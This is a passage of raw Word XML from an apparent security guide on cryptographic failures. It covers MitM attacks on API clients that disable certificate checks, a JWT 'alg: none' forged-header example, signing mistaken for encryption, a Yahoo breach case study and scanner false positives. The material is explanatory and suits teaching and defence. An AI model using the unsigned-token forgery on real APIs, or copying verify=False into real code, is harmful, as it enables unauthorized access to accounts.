            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> if</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>developers do not use secure</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>CSPRNG wrappers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49F7CD5F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>API vs. Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428E9C2A"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 xml:space="preserve">When targeting a headless API (REST, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>gRPC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>) rather than a traditional web frontend, the vectors for cryptographic failures bypass browser defenses and focus directly on object serialization and token parsing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7409CB40"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Attack Vectors &amp; Parameter Bindings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C747D8"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 xml:space="preserve">Traditional web frontends rely heavily on the browser to enforce secure transport protections (like HSTS or the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Secure</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie attribute). With headless APIs, the client application (mobile app, IoT device, or third-party service) is entirely responsible for validating certificates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161BEB09" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Attackers frequently target headless API ecosystems via </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Man-in-the-Middle (MitM)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> setups, exploiting instances where mobile applications or backend API consumers disable SSL/TLS certificate chain validation in their HTTP client configurations (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>verify=False</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Python or ignoring trust chains in mobile code).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48146946"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Payload and State Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52177453"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Instead of standard form parameters, headless APIs heavily utilize JSON Web Tokens (JWTs) or encrypted JSON/XML request bodies to handle state and authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D68272" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>alg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>: none</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Vector:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> An attacker manipulates the cryptographic header parameter of an API token. If the API backend relies on a flawed library or weak configuration, changing the signature algorithm header from </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>HS256</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>none</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> can trick the API parser into accepting a completely unsigned, forged administrative payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085737A5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>// Modified JWT Header Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FE5B75" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0758EA" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>alg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>": "none",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEAF8CE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>typ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>": "JWT"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A57AA9C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cryptographic Signatures vs. Encryption:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> APIs often mistake signing data for encrypting it. Passing sensitive data (like roles or account IDs) inside a base64-encoded JWT structure allows an attacker to easily decode the string, read the plain text, and exploit the lack of application-layer confidentiality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70391037" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Real-World Example: The Yahoo Data Breaches (2013–2014)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582FFD3F"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 xml:space="preserve">One of the most catastrophic examples of systemic </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cryptographic Failures</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurred during the series of massive cyberattacks against Yahoo, which compromised over three billion accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4413500C"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What Went Wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F2C75C"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The core failure lay in Yahoo’s reliance on obsolete and broken cryptographic hashing primitives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D6D696" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">While the company claimed its user credentials were encrypted or hashed, investigations revealed that large portions of their database utilized the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>MD5 hashing algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> without adequate computational stretching or unique salts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F2FAE0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Furthermore, the attackers were able to steal Yahoo's internal proprietary source code, allowing them to locate the specific cryptographic keys and master algorithms used to sign user cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F6107"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The Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468A3AD6"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Because the hashing algorithm (MD5) was fundamentally broken and highly fast, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>statesponsored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> threat actors were able to execute lightning-fast offline cracking campaigns against the exfiltrated database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFFEFCB"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 xml:space="preserve">More severely, by reverse-engineering the exposed cryptographic signature mechanics from the source code, the attackers engaged in </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>cookie minting</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . They generated customized, cryptographically valid session cookies without needing the users' actual passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589F2698"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The Fallout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C988BFA"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The security compromises permanently altered Yahoo's corporate landscape:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333EF234" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The breaches, though occurring in 2013 and 2014, were not fully disclosed until late 2016 —right in the middle of acquisition negotiations with Verizon. As a direct result, Yahoo’s valuation was slashed by </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>$350 million</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DE7C73" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The company faced </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>$35 million</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in regulatory fines from the SEC for failing to disclose the incidents in a timely manner, alongside </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>$50 million</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in class-action settlement costs and immense, irreparable long-term damage to its global brand credibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42590D29" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Advanced Detection &amp; False Positives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5ABF60" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>The False Positive Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6CABC7"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Automated scanners frequently generate false positives when assessing cryptographic failures because they heavily rely on static keyword matching (regex signatures) or simple black-box environment checks without understanding the application's broader context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D06CC54"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Common False Positive Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D9A6F4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dead or Unreachable Code Paths:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A SAST scanner flags a deprecated algorithm like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>DES</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a library or testing utility ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>TestCryptoHelpers.java</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). If that specific class is stripped during the production compilation phase or is never instantiated by the runtime environment, it poses zero threat to production systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E6C2D3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00B74432" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B74432">
        <w:rPr>
